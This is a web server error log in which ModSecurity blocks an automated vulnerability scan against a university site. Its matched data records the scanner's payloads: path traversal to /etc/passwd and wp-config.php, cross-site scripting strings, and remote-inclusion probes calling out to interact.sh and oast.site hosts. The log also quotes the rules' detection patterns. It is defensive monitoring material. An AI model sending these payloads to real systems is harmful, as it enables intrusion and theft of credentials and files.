[Tue Aug 29 11:55:46.563141 2023] [:error] [pid 2730] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16UsCo-f0AAAqqtjQAAAAA"]
[Tue Aug 29 11:55:46.674779 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS_NAMES:<script>alert(35587703)</script>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS_NAMES:<script>alert(35587703)</script>: <script>alert(35587703)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/printenv.shtml"] [unique_id "ZO16UsCo-f0AAAolKwYAAAAe"]
[Tue Aug 29 11:55:46.730823 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "mbkm.unla.ac.id"] [uri "/redirector.php"] [unique_id "ZO16UsCo-f0AAAqSw0QAAAAN"]
[Tue Aug 29 11:55:46.740663 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:login[password]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: = found within ARGS:login[password]: test\\x22><svg/onload=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "mbkm.unla.ac.id"] [uri "/appliance/login.ns"] [unique_id "ZO16UsCo-f0AAApbUoUAAAAh"]
[Tue Aug 29 11:55:47.539223 2023] [:error] [pid 2730] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://example.com found within TX:1: example.com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "mbkm.unla.ac.id"] [uri "/shib_logout.php"] [unique_id "ZO16U8Co-f0AAAqqtjwAAAAA"]
[Tue Aug 29 11:55:48.585226 2023] [:error] [pid 2751] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS_NAMES:<script>alert(35587703)</script>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS_NAMES:<script>alert(35587703)</script>: <script>alert(35587703)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/ssi/printenv.shtml"] [unique_id "ZO16VMCo-f0AAAq-HY0AAAAT"]
[Tue Aug 29 11:55:48.677557 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://example.com found within TX:1: example.com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "mbkm.unla.ac.id"] [uri "/ilias/shib_logout.php"] [unique_id "ZO16VMCo-f0AAAolKxIAAAAe"]
[Tue Aug 29 11:55:52.054317 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16WMCo-f0AAAqY6LMAAAAr"]
[Tue Aug 29 11:55:52.187416 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:login. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:login: \\x5c\\x22 onfocus=alert(document.domain); autofocus \\x5c\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/webshell4/login.php"] [unique_id "ZO16WMCo-f0AAApbUqAAAAAh"]
[Tue Aug 29 11:55:52.275738 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnijtjmimvgniikdb0un9s6osha9dzu.oast.site found within TX:1: cjmnijtjmimvgniikdb0un9s6osha9dzu.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "mbkm.unla.ac.id"] [uri "/umbraco/BackOffice/Api/Help/GetContextHelpForPage"] [unique_id "ZO16WMCo-f0AAAqY6L4AAAAr"]
[Tue Aug 29 11:55:52.607623 2023] [:error] [pid 2753] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnijtjmimvgniikdb03jirejwhtks6i.oast.site/ found within TX:1: cjmnijtjmimvgniikdb03jirejwhtks6i.oast.site/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "mbkm.unla.ac.id"] [uri "/umbraco/backoffice/UmbracoApi/Dashboard/GetRemoteDashboardContent"] [unique_id "ZO16WMCo-f0AAArB1rkAAAAV"]
[Tue Aug 29 11:55:53.744235 2023] [:error] [pid 2754] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:plugin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:plugin: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/wp-content/plugins/whizz/plugins/delete-plugin.php"] [unique_id "ZO16WcCo-f0AAArC7aUAAAAW"]
[Tue Aug 29 11:55:53.877017 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnijtjmimvgniikdb0zihw7jyconzpx.oast.site/ found within TX:1: cjmnijtjmimvgniikdb0zihw7jyconzpx.oast.site/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "mbkm.unla.ac.id"] [uri "/umbraco/backoffice/UmbracoApi/Dashboard/GetRemoteDashboardCss"] [unique_id "ZO16WcCo-f0AAAqeFeYAAAAx"]
[Tue Aug 29 11:55:53.892999 2023] [:error] [pid 2750] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:msgId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ')// found within ARGS:msgId: ';alert('document.domain')//"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/carbon/admin/login.jsp"] [unique_id "ZO16WcCo-f0AAAq@sawAAAAM"]
[Tue Aug 29 11:55:53.951951 2023] [:error] [pid 2707] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:bgColor. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:bgColor: _000000\\x22onload=\\x22prompt(1)"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "mbkm.unla.ac.id"] [uri "/Telerik.ReportViewer.axd"] [unique_id "ZO16WcCo-f0AAAqTvzgAAAAa"]
[Tue Aug 29 11:55:55.750586 2023] [:error] [pid 2753] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "mbkm.unla.ac.id"] [uri "/"] [unique_id "ZO16W8Co-f0AAArB1s4AAAAV"]
[Tue Aug 29 11:55:56.591774 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:s. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:s: ax6zt\\x22><script>alert(document.domain)</script>y6uu6"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/"] [unique_id "ZO16XMCo-f0AAAqY6NEAAAAr"]
[Tue Aug 29 11:55:56.694678 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:controller: ../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16XMCo-f0AAAqeFfYAAAAx"]
[Tue Aug 29 11:55:57.627155 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/wp-content/plugins/db-backup/download.php"] [unique_id "ZO16XcCo-f0AAAqeFf0AAAAx"]
[Tue Aug 29 11:55:58.620111 2023] [:error] [pid 2750] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "mbkm.unla.ac.id"] [uri "/webmail/basic/"] [unique_id "ZO16XsCo-f0AAAq@scAAAAAM"]
[Tue Aug 29 11:55:58.781677 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:p. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: > found within ARGS:p: <img src onerror=alert(/XSS/)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "mbkm.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16XsCo-f0AAAqSw3UAAAAN"]
[Tue Aug 29 11:55:59.940558 2023] [:error] [pid 2650] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wpbase. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:wpbase: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/wp-content/plugins/sourceafrica/js/window.php"] [unique_id "ZO16X8Co-f0AAApa-QoAAAAg"]
[Tue Aug 29 11:56:01.589943 2023] [:error] [pid 2750] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:wlcms[_login_custom_js]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:wlcms[_login_custom_js]: alert(/XSS/);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZO16YcCo-f0AAAq@sdYAAAAM"]
[Tue Aug 29 11:56:01.591526 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: = found within ARGS:username: test\\x22><svg/onload=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "mbkm.unla.ac.id"] [uri "/goform/login_process"] [unique_id "ZO16YcCo-f0AAAq5@KUAAAAK"]
[Tue Aug 29 11:56:01.635422 2023] [:error] [pid 2750] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:hostname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22)</ found within ARGS:hostname: \\x22)</script><script>alert(document.domain);</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/cgi-bin/login.cgi"] [unique_id "ZO16YcCo-f0AAAq@sdgAAAAM"]
[Tue Aug 29 11:56:02.627537 2023] [:error] [pid 2650] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:foruserlogin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:foruserlogin: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/dolibarr/adherents/cartes/carte.php"] [unique_id "ZO16YsCo-f0AAApa-RgAAAAg"]
[Tue Aug 29 11:56:02.801062 2023] [:error] [pid 2754] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:keyword_search. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: --!>\\x22  found within ARGS:keyword_search: --!>\\x22 autofocus onfocus=alert(/2Ue0IXhHNjNl9QMpplilzBsRqJA/);//"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/properties/"] [unique_id "ZO16YsCo-f0AAArC7d0AAAAW"]
[Tue Aug 29 11:56:03.628563 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cat_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:cat_id: 6\\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/"] [unique_id "ZO16Y8Co-f0AAApbUt4AAAAh"]
[Tue Aug 29 11:56:03.744167 2023] [:error] [pid 2650] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:urls[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:urls[]: <img src=x onerror=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "mbkm.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16Y8Co-f0AAApa-R4AAAAg"]
[Tue Aug 29 11:56:04.645063 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:snum. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:snum: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/wp-content/plugins/featurific-for-wordpress/cached_image.php"] [unique_id "ZO16ZMCo-f0AAAqY6PoAAAAr"]
[Tue Aug 29 11:56:04.669453 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "mbkm.unla.ac.id"] [uri "/sap/public/bc/icf/logoff"] [unique_id "ZO16ZMCo-f0AAAqY6PsAAAAr"]
